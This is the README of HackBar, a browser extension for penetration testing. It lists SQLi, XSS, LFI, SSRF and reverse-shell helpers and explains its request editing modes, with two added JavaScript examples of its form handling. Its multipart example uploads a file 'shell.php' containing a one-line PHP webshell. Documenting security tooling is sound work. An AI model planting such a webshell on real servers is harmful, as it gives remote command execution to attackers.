HackBar

A browser extension for Penetration Testing.

Available on Chrome Web Store and Firefox Add-ons.

Requested Permissions

  • storage

    • Save theme preferences
  • scripting

    • Perform POST request
    • Run test function
  • webRequest

    • Remember request information
    • Listen for the finish event to clean up
  • declarativeNetRequest

    • Set HTTP header value based on settings

Features

  • Load

    • From tab (default)
    • From cURL command
  • Supported

  • Auto Test

    • Common paths (Wordlist from dirsearch included)
  • SQLi

    • Dump all database names (MySQL, PostgreSQL)
    • Dump tables from database (MySQL, PostgreSQL, SQLite)
    • Dump columns from database (MySQL, PostgreSQL, SQLite)
    • Union select statement (MySQL, PostgreSQL, SQLite)
    • Error-based injection statement (MySQL, PostgreSQL)
    • Dump in one shot payload (MySQL)
    • Dump current query payload (MySQL)
    • Space to Inline comment
  • XSS

    • Vue.js XSS payloads
    • Angular.js XSS payloads for strict CSP
    • Some snippets for CTF
    • HTML encode/decode with hex/dec/entity name
    • String.fromCharCode encode/decode
  • LFI

    • PHP wrapper - Base64
  • SSRF

    • AWS - IAM role name
  • SSTI

  • Shell

    • Python reverse shell cheatsheet
    • sh(bash) reverse shell cheatsheet
    • nc(ncat) reverse shell cheatsheet
    • PHP webshell/reverse shell cheatsheet
  • Encoding

    • URL encode/decode
    • Base64 encode/decode
    • Hexadecimal encode/decode
    • Unicode encode/decode
    • Escape ASCII with hex/oct
  • Hashing

    • MD5
    • SHA1
    • SHA256
    • SHA384
    • SHA512

Usage

How to open it?

  1. Open Developer Tools (press F12 or Ctrl + Shift + I)
  2. Switch to the HackBar tab
  3. Enjoy it

Shortcuts

Description   Shortcut
Load          Alt + A
Split         Alt + S
Execute       Alt + X
Mode          Alt + M

Request Editing

Basic mode

multipart/form-data

After changing the enctype field to multipart/form-data, you can put your payload into the Body field, for example:

------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--

HackBar treats the first line as the boundary and reconstructs a form element to send your request.

Therefore, the boundary that is actually sent will not be the same as the one you typed.
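The parsing step described above, as an added example that is not HackBar's own code: it takes the first line of a typed body as the boundary and extracts the fields a form would be rebuilt from. The function names and the sample input are constructed for illustration.

```javascript
// Added example, not HackBar's code: read a typed multipart body the way the
// README describes (first line = boundary) and return the fields to rebuild.
function parseTypedMultipart(body) {
  const lines = body.replace(/\r\n/g, '\n').split('\n');
  const boundary = lines[0];
  if (!/^--\S+$/.test(boundary)) throw new Error('first line is not a boundary');
  const closeAt = lines.indexOf(boundary + '--');
  if (closeAt === -1) throw new Error('missing closing boundary');
  const parts = [];
  let chunk = [];
  for (const line of lines.slice(1, closeAt + 1)) {
    if (line !== boundary && line !== boundary + '--') { chunk.push(line); continue; }
    parts.push(parsePart(chunk)); // a delimiter line ends the current part
    chunk = [];
  }
  return { boundary, parts };
}

function parsePart(chunk) {
  const blank = chunk.indexOf(''); // headers end at the first empty line
  if (blank === -1) throw new Error('part has no header/body separator');
  const headers = {};
  for (const h of chunk.slice(0, blank)) {
    const i = h.indexOf(':');
    if (i === -1) throw new Error('malformed header: ' + h);
    headers[h.slice(0, i).trim().toLowerCase()] = h.slice(i + 1).trim();
  }
  const cd = headers['content-disposition'] || '';
  const name = /(?:^|;\s*)name="([^"]*)"/.exec(cd);
  const filename = /;\s*filename="([^"]*)"/.exec(cd);
  if (!name) throw new Error('part has no name');
  return { name: name[1], filename: filename ? filename[1] : null,
           type: headers['content-type'] || null,
           value: chunk.slice(blank + 1).join('\n') };
}

// Constructed, benign sample input in the same layout as the README's example.
const SAMPLE = [
  '------ExampleBoundary0001', 'Content-Disposition: form-data; name="user"', '', 'alice',
  '------ExampleBoundary0001',
  'Content-Disposition: form-data; name="file"; filename="notes.txt"',
  'Content-Type: text/plain', '', 'line one', 'line two',
  '------ExampleBoundary0001--',
].join('\n');
console.log(parseTypedMultipart(SAMPLE));
```

Only the parsed names, filenames, types and values survive into the rebuilt form, which is why the boundary on the wire is whatever the browser generates rather than the typed one.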

application/json

After changing the enctype field to application/json, you can put your payload into the Body field, for example:

{
  "username": "admin",
  "password": "admin"
}

If your payload doesn't contain =:

To post JSON data, HackBar inserts a dummy field or object into your JSON, for example:

{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }

For more details, please visit "Posting JSON with an HTML Form".
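Why the dummy field is needed, as an added example that is not HackBar's own code: a form field is serialized as name=value, so JSON can only travel as one field if it contains an "=" to split on. The sketch assumes the text/plain form encoding (each field sent as name=value followed by CRLF); `jsonToFormField` and `serializeTextPlain` are hypothetical names, and the top-level array case generalizes the README's object example.

```javascript
// Added example, not HackBar's code. DUMMY_KEY reuses the key shown in the README.
const DUMMY_KEY = '4dxnzjzd5mi';

// Split JSON text into a single form field whose text/plain serialization
// ("name=value\r\n") is valid JSON again.
function jsonToFormField(jsonText) {
  const parsed = JSON.parse(jsonText); // reject invalid JSON early
  let text = jsonText;
  if (!text.includes('=')) {
    // No "=" to split on: add a dummy member whose value is "=".
    if (Array.isArray(parsed)) {
      parsed.push({ [DUMMY_KEY]: '=' });
    } else if (parsed !== null && typeof parsed === 'object') {
      parsed[DUMMY_KEY] = '=';
    } else {
      throw new Error('scalar JSON has no place for a dummy "="');
    }
    text = JSON.stringify(parsed);
  }
  const i = text.indexOf('='); // the first "=" becomes the name/value separator
  return { name: text.slice(0, i), value: text.slice(i + 1) };
}

// text/plain form encoding of one field: name, "=", value, CRLF.
function serializeTextPlain(field) {
  return field.name + '=' + field.value + '\r\n';
}

// Constructed sample inputs: one without "=", one that already contains it.
const withoutEq = serializeTextPlain(
  jsonToFormField('{"username":"admin","password":"admin"}'));
const withEq = serializeTextPlain(jsonToFormField('{"q":"a=b"}'));
console.log(JSON.stringify(withoutEq), JSON.stringify(withEq));
```

The trailing CRLF is JSON whitespace, so the receiving parser accepts the body; a payload that already contains "=" is sent without any extra member.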

Raw mode

This mode is implemented with the fetch API. It tries its best to send the request exactly as you typed it.

However, there are some limitations:

Request

  • It is unable to use a specified HTTP protocol version.

    The protocol version is fixed to HTTP/1.1 in the editor, but the version actually used for a request is up to fetch.

  • Some HTTP headers may appear in a sent request even if you don't add them in the editor.
    e.g. Connection, Cache-Control, Pragma, etc.

    These headers will be assigned a default value. For example, Connection: keep-alive, Cache-Control: no-cache.

Response

  • [Chrome] The response always shows HTTP/1.1 if the protocol version used is HTTP/2 or higher.

    See also Chromium Code Search

Third-party Libraries

See package.json for details.

Contributor

0140454, lebr0nli, boylin0, hswift
